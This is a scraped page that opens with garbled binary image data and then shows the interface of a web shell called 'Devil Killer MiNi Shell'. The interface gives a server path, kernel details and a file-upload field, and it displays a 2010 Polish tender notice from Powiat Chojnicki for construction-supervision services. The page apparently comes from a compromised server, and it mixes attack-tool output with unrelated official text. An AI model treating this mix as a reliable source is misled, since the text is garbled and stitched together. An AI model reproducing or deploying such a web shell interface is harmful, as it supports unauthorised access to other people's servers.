JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100630/188598-N-2010.html

<p class="kh_header"><b>Chojnice: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego wraz z kontrolą rozliczenia realizacji projektu pn.:Zadanie nr 1: Adaptacja obiektów poprzemysłowych - Białe Młyny w Chojnicach. Przebudowa, nadbudowa ze zmianą sposobu użytkowania młyna przy ul. Piłsudskiego w Chojnicach na potrzeby Powiatowego Centrum Pomocy Rodzinie i Poradni Psychologiczno - Pedagogicznej,
Zadanie nr 2: Centrum Edukacyjno-Wdrożeniowe w Chojnicach. Przebudowa, rozbudowa i zmiana sposobu użytkowania budynku Młyna Chojnickiego</b><br>
<b>Numer ogłoszenia: 188598 - 2010; data zamieszczenia: 30.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chojnicki , ul. 31 Stycznia 56, 89-600 Chojnice, woj. pomorskie, tel. 052 3966533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru Inwestorskiego wraz z kontrolą rozliczenia realizacji projektu pn.:Zadanie nr 1: Adaptacja obiektów poprzemysłowych - Białe Młyny w Chojnicach. Przebudowa, nadbudowa ze zmianą sposobu użytkowania młyna przy ul. Piłsudskiego w Chojnicach na potrzeby Powiatowego Centrum Pomocy Rodzinie i Poradni Psychologiczno - Pedagogicznej,
Zadanie nr 2: Centrum Edukacyjno-Wdrożeniowe w Chojnicach. Przebudowa, rozbudowa i zmiana sposobu użytkowania budynku Młyna Chojnickiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamiarem Zamawiającego jest, aby Wykonawca - Nadzór Inwestorski działał przy realizacji inwestycji w jego imieniu.

a) Przedmiotem zamówienia jest pełnienie funkcji Inspektora Nadzoru Inwestorskiego wraz z kontrolą rozliczenia realizacji projektu pn.: 
Zadanie nr 1: Adaptacja obiektów poprzemysłowych - Białe Młyny w Chojnicach. Przebudowa, nadbudowa ze zmianą sposobu użytkowania młyna przy ul. Piłsudskiego w Chojnicach na potrzeby Powiatowego Centrum Pomocy Rodzinie i Poradni Psychologiczno - Pedagogicznej, 
Zadanie nr 2: Centrum Edukacyjno-Wdrożeniowe w Chojnicach. Przebudowa, rozbudowa i zmiana sposobu użytkowania budynku Młyna Chojnickiego w ramach projektu Centrum Edukacyjno - Wdrożeniowe w Chojnicach realizowanego w ramach Regionalnego Programu Operacyjnego dla Województwa pomorskiego na lata 2007-2013.


b) Łączna wartość robót budowlano-instalacyjnych objętych nadzorem wynosi: 
Zadanie 1:    2 887 943,95 zł brutto
Zadanie 2:    5 292 864,87 zł brutto
c) Wybrano wykonawcę, który zrealizuje zadanie za w.w kwotę.
d) Planowane terminy realizacji rzeczowej projektów do dnia 30.07.2011 r.

W ramach pełnienia funkcji Inspektora Nadzoru Inwestorskiego do podstawowych obowiązków Wykonawcy należy w szczególności: 
1)	reprezentowanie Inwestora na budowie poprzez sprawowanie kontroli zgodności jej realizacji z projektem, zasadami wiedzy technicznej, obowiązującymi przepisami techniczno - budowlanymi, bhp, przeciw pożarowymi i normami oraz pozwoleniem na budowę 
2)	sprawdzanie jakości wykonanych robót i wbudowanych materiałów budowlanych, co  ma za zadanie zapobiegać zastosowania wadliwych i niedopuszczonych wyrobów budowlanych do stosowania w budownictwie, 
3)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających
4)	uczestniczenie w prowadzonych próbach i odbiorach technicznych instalacji, urządzeń technicznych 
5)	przygotowanie i uczestniczenie w czynnościach odbioru gotowych elementów obiektu 
6)	przekazanie gotowego obiektu budowlanego do użytkowania 
7)	potwierdzenie faktycznie wykonanych robót
8)	potwierdzenie usunięcia przez wykonawcę ewentualnych wad, usterek, niedoróbek
9)	kontrolowanie końcowego rozliczenia budowy
10) zarządzanie realizacją postanowień umowy zawartej z wykonawcą robót budowlanych.



Charakterystyka zadania budowlanego, nad którym sprawowany będzie nadzór.
W.w inwestycja obejmuje następujące branże:
a)	konstrukcyjno-budowlana
b)	sanitarna
c)	elektryczna


Zakres robót w ramach poszczególnych zadań:
Zadanie 1
Branża konstrukcyjno - budowlana:
* roboty przygotowawcze i rozbiórkowe
* roboty betonowe, murowe, zbrojarskie 
* montaż i pokrycie konstrukcji dachu
* roboty wewnętrzne
* mała architektura
* montaż windy
Branża sanitarna:
*  przyłącze kanalizacyjne
* wewnętrzna instalacja wod-kan
* wewnętrzna instalacja c.o.
*   instalacja wentylacji 
Branża elektryczna:
* wewnętrzna instalacja elektryczna
* instalacja odgromowa
* monitoring
* instalacja telefoniczna
* instalacja RTV
* instalacja wentylacji


Zadanie 2
Branża konstrukcyjno-budowlana:
* roboty przygotowawcze i rozbiórkowe
* roboty ziemne
* roboty fundamentowe
* roboty betonowe, murowe, zbrojarskie 
* montaż i pokrycie konstrukcji dachu
* roboty wewnętrzne
* mała architektura
* montaż windy
* place i parking
Branża sanitarna:
* przyłącze wodociągowe
* przykanalik sanitarny
* kanalizacja deszczowa
* wewnętrzna instalacja wod-kan
* wewnętrzna instalacja c.o.
* kotłownia gazowa
* instalacja gazowa
* instalacja solarna
* wentylacja mechaniczna
Branża elektryczna:
*  wewnętrzna linia zasilająca
*  instalacja elektryczna
*  instalacja odgromowa
* system sygnalizacji pożaru
* system telewizji dozorowej
*  sieć strukturalna
* system sygnalizacji włamania i napadu

Dokumenty posiadane przez Zamawiającego - konieczne do realizacji zamówienia:
* projekty budowlane i wykonawcze we wszystkich branżach,
* specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych,
* przedmiary robót
* kosztorys ofertowy
*umowa z wykonawcą robót
* pozwolenie na budowę


Obowiązki ogólne.
Inspektor Nadzoru Inwestorskiego nad realizacją zadań:
Zadanie nr 1: Adaptacja obiektów poprzemysłowych - Białe Młyny w Chojnicach. Przebudowa, nadbudowa ze zmianą sposobu użytkowania młyna przy ul. Piłsudskiego w Chojnicach na potrzeby Powiatowego Centrum Pomocy Rodzinie i Poradni Psychologiczno - Pedagogicznej, 
Zadanie nr 2: Centrum Edukacyjno-Wdrożeniowe w Chojnicach. Przebudowa, rozbudowa i zmiana sposobu użytkowania budynku Młyna Chojnickiego w ramach projektu Centrum Edukacyjno - Wdrożeniowe w Chojnicach realizowanego w ramach Regionalnego Programu Operacyjnego dla Województwa pomorskiego na lata 2007-2013.
jest zobowiązany do wykonywania obowiązków, jakie obciążają Zamawiającego - Inwestora Bezpośredniego, a w szczególności:
1.	Wywiązywania się z tytułu zawartej umowy z wykonawcą robót oraz obowiązków wynikających z prawa administracyjnego w związku z realizacją inwestycji, a w szczególności przepisów Ustawy z dnia 07.07.1994 r. Prawo budowlane ( Dz. U. z 2003 r. Nr 207, poz. 2016 wraz z późniejszymi zmianami) oraz Ustawy z dnia 27.03.2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późniejszymi zmianami) Ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (Dz. U. Nr 19 poz. 177).
2.	Opracowania harmonogramów rzeczowo-finansowych dla jednostek współfinansujących inwestycję.
3.	Powiadomienia organu nadzoru budowlanego o terminie rozpoczęcia robot, z załączeniem oświadczeń kierownika budowy i inspektorów nadzoru, potwierdzającym przyjęcie obowiązków na budowie.
4.	Uczestnictwa w przekazaniu terenu budowy Wykonawcy robót budowlanych.
5.	Sprawowania kontroli nad zgodnością i prawidłowością realizacji robót z dokumentacją projektową i pozwoleniami na budowę, SIWZ, ofertą wykonawcy, zawartą umową, przepisami i obowiązującymi Polskimi Normami oraz zasadami wiedzy technicznej.
6.	Sprawnego zarządzania inwestycją w sposób umożliwiający:
- kontrolę i rejestrację postępu robót,
- kontrolę finansowania,
- rejestrację zmian.
7.	Oceny użytych przez Wykonawcę materiałów budowlanych:
- nadzorowanie badań materiałów budowlanych,
- kontrola sposobu składowania i przechowywania materiałów,
- zatwierdzanie receptur i technologii proponowanych przez Wykonawcę robót,
- zatwierdzanie przed wbudowaniem materiałów i półwyrobów oraz dokonywanie ich  oceny jakościowej i zgodności z wymaganiami obowiązujących norm
- zlecanie Wykonawcy wykonania dodatkowych badań materiałów budzących wątpliwość co do ich jakości,
- w przypadku użycia przez Wykonawcę materiałów zamiennych, jednakże spełniających parametry techniczne wymagane w dokumentacji projektowej, Wykonawca winien uzyskać pisemne: aprobatę Projektanta.
8.	Kontroli robót:
- prowadzenia regularnych inspekcji na terenie budowy w celu sprawdzenia jakości wykonanych robót,
- monitorowania realizacji zawartej umowy i składanie co miesięcznych raportów Zamawiającemu,
- żądania od kierownika budowy lub robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, 
- podejmowania decyzji o wstrzymaniu części lub całości robót, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalna niezgodność z projektem lub pozwoleniem na budowę,
- wnioskowania o usunięcie z terenu budowy każdej osoby zatrudnionej przez Wykonawcę robót, która zachowuje się niewłaściwie, jest niekompetentna lub niedbała w swojej pracy,
- dokonywania obmiaru wykonanych robót,
- odbioru robót zanikających i ulegających zakryciu.
9.	Kontroli prawidłowości prowadzenia dziennika budowy, książek obmiarów i   dokonywanie wpisów.
10.	sporządzania i przechowywania dokumentacji dotyczącej prowadzonego nadzoru.
11.	Badań, pomiarów, zlecenia i wykonania ekspertyz, kontrolnych badań laboratoryjnych i pomiarów geodezyjnych w razie potrzeb wykonanych robót.
12.	Udzielania Wykonawcy robót wszelkich dostępnych informacji i wyjaśnień dotyczących danego zadania.
13.	Współdziałania - porozumienia z autorem dokumentacji projektowej w zakresie sprawowanego przez niego nadzoru autorskiego i uzyskiwania od Projektanta zgody na zmiany w zakresie projektu budowlanego.
14.	Organizowania, przeprowadzania i dokonywania po uprzednim zawiadomieniu  Zamawiającego, czynności odbiorów częściowych oraz wstępnego i końcowego dla poszczególnych części zdania od Wykonawcy robót, a w szczególności:
- sprawdzenia gotowości do odbioru,
- przeprowadzenia komisyjnych odbiorów częściowych i wstępnych,
- wystawienia świadectwa odbioru końcowego,
- przekazania przedmiotu odbioru Zamawiającemu wraz z dokumentacją powykonawczą,
- dokonania odbioru końcowego po upływie terminu gwarancji.
15.	Sporządzania i przekazywania Zamawiającemu podpisanych protokołów odbiorów częściowych robót wraz ze sprawdzonym rozliczeniem finansowym tych prac, dokumentacji rzeczowo - finansowej - powykonawczej w sposób zapewniający sprawne i terminowe płatności Wykonawcy robót.
16.	Egzekwowania od Wykonawcy robót obsługi geodezyjnej i inwentaryzacji powykonawczej robót.
17.	Opracowania informacji niezbędnych Zamawiającemu do uzyskania dodatkowych  środków finansowych, a w razie potrzeby fachowa pomoc Zamawiającemu przy ich sporządzaniu.
18.	Kontrolowania prawidłowości treści protokołów odbioru oraz faktur sporządzanych             przez wykonawcę robot w zakresie fakturowania robót finansowanych przez jednostki współfinansujące.
19.	Rozliczenia umowy na roboty budowlane w przypadku jej wypowiedzenia.
20.	Kontrolowania przestrzegania przez Wykonawcę robót zasad BHP oraz utrzymania              porządku na terenie budowy.
21.	Zachowania wymagań ochrony środowiska.
22.	Informowania z wyprzedzeniem i uzgadnianie z Zamawiającym odstępstw od zakresu podstawowego inwestycji (zmian technicznych, robotach dodatkowych) powodujących wzrost kosztów inwestycji.
23.	Zapobiegania roszczeniom Wykonawcy robót.
24.	Identyfikowania wszędzie gdzie jest to możliwe ryzyk powstania potencjalnych roszczeń ze strony Wykonawcy robót i stron trzecich i informowania o tym Zamawiającego z propozycjami sposobów zapobiegania tym roszczeniom.
25.	Powiadomienia Zamawiającego o wszelkich roszczeniach Wykonawcy robót oraz rozbieżnościach między dokumentacją Zamawiającego a stenem faktycznym na terenie budowy.
26.	Rozpatrywania roszczeń Wykonawcy robót i przedstawienia stanowiska w odniesieniu do nich.
27.	W przypadku, gdy wszczęty zostanie spór sądowy między Zamawiającym a Wykonawcą robót dotyczący realizacji inwestycji, wsparcie Zamawiającego, poprzez przedstawienie wyczerpujących informacji i wyjaśnień dotyczących sporu oraz jednoznacznego stanowiska Wykonawcy co do przedmiotu sporu.
28.	Udziału w rozwiązywaniu wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją inwestycji.
29.	Znajomości wszystkich przepisów wydanych przez władze centralne i miejscowe oraz innych przepisów i wytycznych, które w jakikolwiek sposób są związane z robotami. Inspektor Nadzoru Inżynierskiego będzie w pełni odpowiedzialny za przestrzeganie tych praw, przepisów i wytycznych podczas realizacji inwestycji.
30.	Inspektor Nadzoru Inwestorskiego wraz z Wykonawcą przygotują na dzień odbioru końcowego niezbędną dokumentację i wniosek do PINB celem zgłoszenia zakończenia robót lub uzyskania decyzji o pozwoleniu na użytkowanie.

Inspektor Nadzoru Inwestorskiego działając na zasadzie starannego stosowania się do 
przepisów kodeksu cywilnego ponosi wobec Inwestora odpowiedzialność za wyrządzone
szkody będące następstwem nienależytego wykonania czynności objętych niniejszym
zamówieniem publicznym do wysokości faktycznie poniesionych strat.

Etap po zakończeniu robót.
Obsługa okresu gwarancyjnego:
1.	Nadzór nad usunięciem usterek stwierdzonych w trakcie końcowego odbioru i w trakcie okresu gwarancyjnego oraz protokolarne potwierdzenie ich usunięcia.
2.	Przeprowadzenie przeglądów gwarancyjnych z udziałem Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp - do 20 % wartości zamówienia, na zasadach określonych w przedmiotowym artykule.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalności prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga    
        posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponowali  osobami w celu obsadzenia stanowisk:
 a) 1 osobą na stanowisko inspektora nadzoru w specjalności konstrukcyjno -                   
   budowlanej posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności budowlano-konstrukcyjnej lub równoważne oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową oraz posiadanie uprawnień zawodowych wymaganych do wykonywania prac na obiektach zabytkowych /zgodnie z Rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004 r. w sprawie prowadzenia prac 	konserwatorskich , restauratorskich , robót budowlanych , badań konserwatorskich i architektonicznych , a 	także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych  i 	poszukiwań ukrytych lub porzuconych zabytków ruchomych ( Dz. U. Nr 150, poz. 1579/   lub inne 	odpowiednie wydane na podstawie wcześniej obowiązujących przepisów/.

b) 1 osobą na stanowisko inspektora nadzoru w specjalności instalacyjnej       (sanitarnej)- posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych lub równoważne oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową,

c)	1 osobą na stanowisko inspektora nadzoru w specjalności instalacyjnej (elektrycznej)- posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektroenergetycznych lub równoważne oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa, co najmniej 5-letnie doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony formularz ofertowy - druk OFERTA,
2)	Wypełniony formularz cenowy - wg załącznika nr 1a do siwz.
3)	Pełnomocnictwo dla osoby podpisującej ofertę do występowania w imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych -  wg załącznika nr 6 do siwz.
4)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom -   wg  załącznika nr 7.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	 Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty w zakresie zmiany terminu realizacji przedmiotu umowy w przypadku:
1)	konieczności udzielenia zamówienia dodatkowego, nieobjętego zamówieniem podstawowym, którego wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
a)	z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby podniesienia niewspółmiernie wysokich kosztów,
b)	prawidłowe wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego.
2)	wystąpienia okoliczności niezależnych od wykonawcy skutkujących niemożliwością dotrzymania terminu realizacji przedmiotu umowy,
3)	aktualizacji rozwiązań ze względu na postęp technologiczny, 
